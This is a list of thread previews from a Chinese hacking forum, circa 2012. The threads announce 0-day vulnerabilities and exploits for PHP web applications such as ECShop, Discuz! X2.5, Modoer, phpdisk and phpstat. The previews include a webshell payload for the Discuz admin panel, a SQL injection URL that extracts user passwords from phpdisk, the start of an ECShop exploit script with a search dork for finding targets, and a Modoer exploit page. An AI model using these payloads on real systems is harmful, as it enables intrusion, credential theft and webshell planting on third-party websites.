最新xdcms_v2.0.2 0DAY

开始吧在留言的地方lists.php文件<?phpclass lists extends db{public function init(){$input=base::load_class('input');$formid=isset($_GET)?intval($_GET):0;$form_arr=base::load_cache("cache_form","_form");$form=get_array($form_arr,'id',$formid,0);$field=base::load_cache("cache_form_"

2012-10-26 18:30 13 3324

Anwsion(v1.1-Beta4) 注入

\app\home\main.php(85): public function explore_action() { // 省略........... By.Rices -> Forum: T00ls.Net -> Blog: Rices.so if ($_GET) { if (is_numeric($_GET)) //据说以前这里也可以注射 所以被isnum

2012-10-26 13:49 15 3705

phpstat 读文件

./count/count.com.php$website = $_GET;$image = $_GET;//确定图片if(!$image)$imagesrc = "../templates/".TPL_NAME."/".TPL_IMGDIR."/icos/countlogo1.gif";else$imagesrc = "../templates/".TPL_NAME."/".TPL_IMGDIR."/icos/".$image;//发送图片 header("Content-type: image/gif");readfile($i

2012-10-19 21:39 13 3420

ECShop <= v2.7.3 SQL injection / exploit

{:6_449:} 好像是最新的<?phpprint_r('+---------------------------------------------------------------------------+ECShop <= v2.7.3 SQL injection / exploitby 帅的一塌糊涂mail: hiqiushuiabc gmail dot comteam: http://hi.baidu.com/w5r2dork: "Powered by ECShop"+-----------------------

2012-10-10 00:21 20 6817

Discuz! X2.5管理后台uc配置 get webshell漏洞

首先,进入后台以管理员身份登录; 然后,打开站长→UC设置 看截图:在UC设置ip地址里面填写 经过处理的一句话如下 Madman\’);eval($_POST)?>;// QQ 然后保存即可。 连接地址:http://bbs.xxxxx.com/config/config_ucenter.php

2012-10-9 22:01 11 3952

补发20120407 Discuz! X2.5 远程代码执行漏洞及EXP[XDAY]

最近大家开始关注discuz了,由于之前t00ls关站好久,错过一些dz的漏洞,转载下。if(!defined('IN_DISCUZ')) {@@ -89,7 +89,7 @@}}if($searcharray && $replacearray) {- $content = preg_replace("/(.*?)|()|(\(\d+)\)/ies", 'helper_seo::base64_transform("encode", "", "\\1\\2\\3", "")', $content

2012-10-9 21:57 23 5001

Modoer EXP

声明:本漏洞是t00ls -- 大牛挖的!本菜自己需要用就写了一个!!<html><head><title> Modoer EXP </title><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /></head><script language="javascript"> function expstart() { var url = document.forms.url.value; if(url !

2012-9-24 03:11 13 3929

Modoer 点评系统注射 几个版本通杀

不给力的注射, 搞某站挖的, 查了下没什么大站用这个 影响不大 发出来大家交流学习, 废话不多说, 看我们的猪肉点~~~~~{:6_409:}首先\core\modules\item\ajax.php开始调用~$do = trim($_GET);$op = trim($_GET);// 允许的操作行为$allowacs = array( 'respond', 'review', 'subject', 'picture', 'guestb

2012-9-23 02:08 20 5511

akcms代码执行漏洞

上周挖出的akcms的后台模版getshell感觉没什么新意,然后又仔细看了看代码,发现了一个比较有“前途”的洞,代码执行漏洞,而且出问题函数是作者提供给建站用户进行二次开发时使用的,也就是说这个问题放大的程度也会要大些。 0x01原理分析 漏洞问题主要存在于include\common.func.php文

2012-9-21 16:41 10 3653

phpdisk 老漏洞新用法 以及后台拿SHELL办法

以前暴出过通杀0DAY代码如下 /api/datacall.php?type=user&limit=1&order=1 and(select 1 from(select count(*),concat((select (select (select concat(0×27,0x7e,pd_users.username,0×27,0x7e,pd_users.password,0×27,0x7e) from pd_users where userid=1 limit 0,1)) from information_schema.ta

2012-9-15 11:47 22 4225